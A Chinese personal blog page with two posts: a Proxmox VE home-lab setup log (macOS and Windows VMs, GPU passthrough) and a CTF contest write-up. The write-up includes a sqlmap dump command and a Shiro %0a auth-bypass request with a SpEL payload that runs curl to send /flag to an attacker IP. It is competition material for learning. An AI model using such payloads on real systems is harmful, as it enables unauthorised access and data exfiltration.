2022年12月

记录一下PVE环境的搭建过程

0 条评论 默认分类 小记录 Yunoon

前言

继硬件更新后,就可以做黑果了,前期起初打算是做物理机的黑果的,始终不成功,后面发现是镁光固态的缘故导致的(这个问题我以前在装笔记本的黑果时也遇到过)。

在以前机缘巧合下,观看了国光师傅的PVE环境搭建,感觉很酷,在不追求极致的性能下,我就选择了PVE来搭建。

硬件配置

CPU: i5 8600k
内存: 16G+8G+8G
主板:MSI Z370 银蛇环 GAMMING
硬盘(PVE系统):凯侠 RC10 1T
显卡1(windows游戏):Nvidia GTX1060 5G
显卡2(macOS): AMD RX580 2304SP 8G
电源:鑫谷 650W
网卡:BCM94360CD
硬盘:西数 1T+2T、影驰240G(存放原神)
显示器1:DELL 2404
显示器2:DELL 2304
机箱:先马 黑洞

PVE虚拟设备

目前除了2台虚拟化的主力设备以外,我还将以前vmware中的虚拟机也迁移到了PVE上,以及一台群晖。

各个虚拟机搭建环节

macOS

前言

基本上是参考了国光师傅的整个流程,需要的是仔细,但由于粗心没有照着一步一步的点点点,甚至还额外学到了一些东西。

正文

镜像准备
  • macOS系统镜像
  • open core的引导镜像
  1. macOS的系统镜像,因为手头只有黑果小兵的打包镜像,只有黑果小兵的打包镜像,这种镜像是无法直接用OC引导的,需要刷入U盘才行。 我这是直接拿的官方的GitHub项目直接编译的。
  2. 官方镜像GitHub地址:https://github.com/thenickdude/OSX-KVM
    git clone https://github.com/thenickdude/OSX-KVM
    cd OSX-KVM
    cd scripts monterey
    make Monterey-recovery.img
    

    最终在当前make的目录会得到镜像文件

    将dmg改为iso后上传镜像即可。
创建虚拟机
  1. open core的引导镜像
    opencore的镜像直接从GitHub release下拿就行
    https://github.com/thenickdude/KVM-Opencore/releases

    解压后,上传即可。

  2. 避免安装时的循环死机,进PVE中,给配置文件添加参数。

    echo "options kvm ignore_msrs=Y" >> /etc/modprobe.d/kvm.conf && update-initramfs -k all -u
    reboot
    
  3. 然后就是添加引导、创建虚拟机的一个过程了,和物理机的黑果类似。

    更改名称、VM-ID即可,这里的VM-ID是唯一标识码。

  4. 选择opencore作为光盘镜像

    系统选择othoer

  5. 系统配置,显卡选用vmware兼容,其实默认也行
    Bios选用OVMF(UEFI),机器架构是q35

  6. 硬盘类型选择VirtoIO Block,缓存为Write back,硬盘大小请随意(最好不要低于128G,当然你如果硬要把应用全塞另外的盘,那就是你对)。

  7. CPU类型选Penryn,核心也是看着给,开启NUMA2.

  8. 内存最好不要低于8G,这里只能填MB,所以说1024*N这样。

  9. 网卡类型选择半虚拟化

  10. 再添加一块硬盘,目前我们只有引导盘,没有系统镜像盘。

配置修改

  1. 之后,进PVE系统,nano更改一下磁盘的类型,改为cache=unsafe

    nano /etc/pve/qemu-server/<VM-ID>.conf 这里的VM-ID就是开头创建的VM-ID。
    
    



    再添加CPU信息

    INTEL: args: -device isa-applesmc,osk="ourhardworkbythesewordsguardedpleasedontsteal(c)AppleComputerInc" -smbios type=2 -device usb-kbd,bus=ehci.0,port=2 -cpu host,kvm=on,vendor=GenuineIntel,+kvm_pv_unhalt,+kvm_pv_eoi,+hypervisor,+invtsc
    
    AMD: args: -device isa-applesmc,osk="ourhardworkbythesewordsguardedpleasedontsteal(c)AppleComputerInc" -smbios type=2 -device usb-kbd,bus=ehci.0,port=2 -cpu Penryn,kvm=on,vendor=GenuineIntel,+kvm_pv_unhalt,+kvm_pv_eoi,+hypervisor,+invtsc,+pcid,+ssse3,+sse4.2,+popcnt,+avx,+avx2,+aes,+fma,+fma4,+bmi1,+bmi2,+xsave,+xsaveopt,check
    

    然后control + O,回车键保存文件,control + X,退出nano。
    最终的配置文件就是下面这样

  2. 进入选项中,更改一下引导顺序。

    将opencore引导盘放置最前面。

启动虚拟机

  1. 点击启动后,成功启动,接下来就是黑苹果系统的正常安装操作。(以下仅截图就不做说明了)








    等待完毕后,进入系统即可,这里的时间没这么久,具体要取决于硬盘性能。

  2. 重启后,选择macOS installer

  3. 依旧会再次重启,这里在选择macOS installer

  4. 成功安装后,选择macOS启动即可。

安装完成

  1. 安装完成后,根据引导选择相关的配置进去即可,不要登录账号、不要登录账号、不要登录账号!!!,因为这里的三码是默认的,有风险。



  2. 安装完成

显卡直通

  1. 其实可以直接看国光师傅的了,直接添加PCI硬件就行了。

  2. 关闭显示的vmware兼容即可,因为RX580免驱,黑果的常识就不多说了。

  3. 之后我们需要注意一个点,因为没了vnc,我们需要直通一套键鼠才行。

    选择USB端口,关闭USB3.0、关闭USB3.0、关闭USB3.0、关闭USB3.0,这里也是个坑点,开了直接进不去系统就黑了。

  4. 这里的显卡已经成功驱动了。

网卡直通、蓝牙

和显卡一样的操作,直接添加即可。

蓝牙在USB设置中,同样添加即可。

关机相关

出现问题的话直接选择关闭主机,不要选关机,因为是other系统,PVE没有关闭系统的指令。

EFI配置

  1. 然后就是黑果的基本操作了,改三码、启动时间啥的。
  2. 这里就不多说了。(摆

windows

前言

windows虽然没这么多讲究,但我开始装的时候也遇到了点麻烦。

镜像准备

windows镜像
virtio 驱动镜像

windows镜像 https://www.microsoft.com/zh-cn/software-download/windows10

virtio官方镜像 https://fedorapeople.org/groups/virt/virtio-win/direct-downloads/archive-virtio/virtio-win-0.1.215-2/virtio-win-0.1.215.iso

安装

  1. 安装就直接把windows镜像作为引导盘启动
  2. 把virtio挂载就行

GTX1060 直通

跟着掘金上的一篇文章成功驱动
没有用到vbios,就添加了下配置。
https://juejin.cn/post/7101389906043207694#heading-4

  1. 看pci地址
    lspci -v
  2. 查看显卡的具体路径
    lspci -n -s 82:00
    lspci -n -s 82:00
    
  3. 开启iommu和pci相关配置
    nano /etc/default/grub
    修改
    GRUB_CMDLINE_LINUX_DEFAULT="quiet"
    修改为
    GRUB_CMDLINE_LINUX_DEFAULT="quiet intel_iommu=on iommu=pt pcie_acs_override=downstream,multifunction nofb nomodeset video=vesafb:off video=efifb:off vfio-pci.ids=10de:1c04,10de:10f1"
    保存、退出
    
  4. 更新grub启动
    update-grub
  5. 加载vfio驱动
    nano /etc/modules
    添加以下内容
    vfio
    vfio_iommu_type1
    vfio_pci
    vfio_virqfd
    保存、退出
    
  6. 更新配置,重启
    update-initramfs -u -k all && reboot now
  7. 禁止host驱动GPU
    nano /etc/modprobe.d/pve-blacklist.conf
    options vfio_iommu_type1 allow_unsafe_interrupts=1
    options kvm ignore_msrs=1
    options kvm-intel nested=Y
    blacklist nouveau
    options nouveau modeset=0
    blacklist nvidiafb
    blacklist amdgpu
    blacklist radeon
    blacklist nvidia
    blacklist snd_hda_codec_hdmi
    blacklist snd_hda_intel
    blacklist snd_hda_codec
    blacklist snd_hda_core
    
    保存、退出
    
  8. 更新配置
    update-initramfs -u -k all && reboot now

成功驱动

Vmware迁移

前言

这里也耽搁了大半天,主要问题是在vmdk文件的完整性,和硬盘的类型。

  1. vmdk的话有两种方法
    1. 直接将以前的vmdk复制出来,但有些虚拟机的vmdk是分片的,所以需要用工具进行整合,可以看我另一篇文章。
      https://yuno0n.top/index.php/archives/60/
    2. 我是用vmware导出ovf后(直接导出的vmdk无法使用),导入macOS里的vmware实现合并的,当时忘了可以用工具合并,导致用了2倍的时间。
  2. 硬盘类型先选IDE,成功驱动后,进系统,添加相关参数,就可以开启SCSI咯。

群晖

前言

群晖在zy的帮助下,一波点亮,没什么问题,就不多说了。


【E3p1o1t-1】重庆市大学生信息安全竞赛 WriteUP

0 条评论 CTF WP Yunoon

前言

川渝大学生信息安全竞赛(bushi
misc做得少,2个盲水印没出。

WEB

WEB3

  1. sqlmap -u "http://f47b450586d37024.node.nsctf.cn/index.php" --data "session_id=t6kvde8irh72fjte5sjdddjna0" -D level1 -T secrets -C secret --dump secret

easy_java

  1. shiro1.9 %0a绕过权限绕过
  2. spel命令执行
  3. curl文件外带
POST /admin/flag%0aa HTTP/1.1
Host: 1fe71bef758cbc4b.node.nsctf.cn
Content-Length: 104
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Origin: http://1fe71bef758cbc4b.node.nsctf.cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://1fe71bef758cbc4b.node.nsctf.cn/admin/flag%0aa
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close

spel=T(java.lang.Runtime).getRuntime().exec('curl -X POST -F xx=@/flag <ip>:8848/?r=`whoami`')

MISC

sunflower

  1. foremost提取出2张一样的图片

  2. 盲水印解密得到flag

  3. 盲水印解密GitHub链接
    https://github.com/chishaxie/BlindWaterMark

precision

  1. file发现精度有问题

  2. 修改精度可以打开图片

  3. binwalk提取到zip文件

  4. 盲水印提取到字符串

  5. 利用字符串解压后, 得到base.txt

  6. base32隐写, 脚本一把梭。

import base64

table='ABCDEFGHIJKLMNOPQRSTUVWXYZ234567'
file = open("base.txt")
flag=''
tmpbin=''

for line in file.readlines():
    line=line.strip('\n')
    if(line[-1]=='='):
        if(line[-3]=='='):
            if(line[-4]=='='):
                if (line[-6] == '='):
                    i=table.index(line[-7])
                    b = bin(i)[2:]
                    b = b.zfill(5)
                    tmpbin+=b[-2:]
                    print(line)
                    print(b)
                else:
                    i = table.index(line[-5])
                    b = bin(i)[2:]
                    b = b.zfill(5)
                    tmpbin += b[-4:]
                    print(line)
                    print(b)
            else:
                i = table.index(line[-4])
                b = bin(i)[2:]
                b = b.zfill(5)
                tmpbin += b[-1:]
                print(line)
                print(b)
        else:
            i = table.index(line[-2])
            b = bin(i)[2:]
            b = b.zfill(5)
            tmpbin += b[-3:]
            print(line)
            print(b)

length= len(tmpbin)/8
for i in range(int(length)):
    flag+=chr(int(tmpbin[i*8:i*8+8],2))

print(tmpbin)
print(flag)

Crypto